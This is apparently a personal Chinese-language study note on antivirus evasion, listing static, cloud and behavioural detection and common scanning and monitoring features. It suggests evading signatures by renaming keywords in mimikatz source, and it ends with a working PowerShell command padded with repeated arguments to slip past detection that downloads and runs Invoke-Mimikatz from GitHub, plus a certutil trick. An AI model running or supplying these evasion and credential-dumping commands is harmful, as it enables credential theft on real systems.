1.杀软查杀的方式

在查询资料之前,写一下自己知道的。

  • 静态查杀:静态查杀主要通过特征码进行匹配,比较基础的像mimikatz的源码中出现多个特征词。所以一个基础的mimikatz的免杀思路是下载源码,然后vs打开后直接关键词替换。
  • 云查杀:云查杀是在云中存放各地上传的特征值和木马,然后进行动态的检测。、
  • 动态查杀(行为查杀)

2.杀毒软件检测方式

扫描技术

1.扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。

2.程序篡改防护:避免恶意程序借由删除杀毒侦测程序而大肆破坏。

3.修复技术:对恶意程序所损坏的文件进行还原

4.急救盘杀毒:利用空白U盘制作急救启动盘,来检测电脑病毒。

5.智能扫描:扫描最常用的磁盘,系统关键位置,耗时较短。

6.全盘扫描:扫描电脑全部磁盘,耗时较长。

7.勒索软件防护:保护电脑中的文件不被黑客恶意加密。

8.开机扫描:当电脑开机时自动进行扫描,可以扫描压缩文档和可能不需要的程序。

监控技术

1.内存监控:当发现内存中存在病毒的时候,就会主动报警;监控所有进程;监控读取到内存中的文件;监控读取到内存的网络数据。

2.文件监控:当发现写到磁盘上的文件中存在病毒,或者是被病毒感染,就会主动报警。

3.邮件监控:当发现电子邮件的附件存在病毒时进行拦截。

4.网页防护:阻止网络攻击和不安全下载。

5.行为防护:提醒用户可疑的应用程序行为。

ShadowMccc:
进程链

ShadowMccc:
行为链

ShadowMccc:
敏感api

内网命令运行bypass:

powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
certutil&&certutil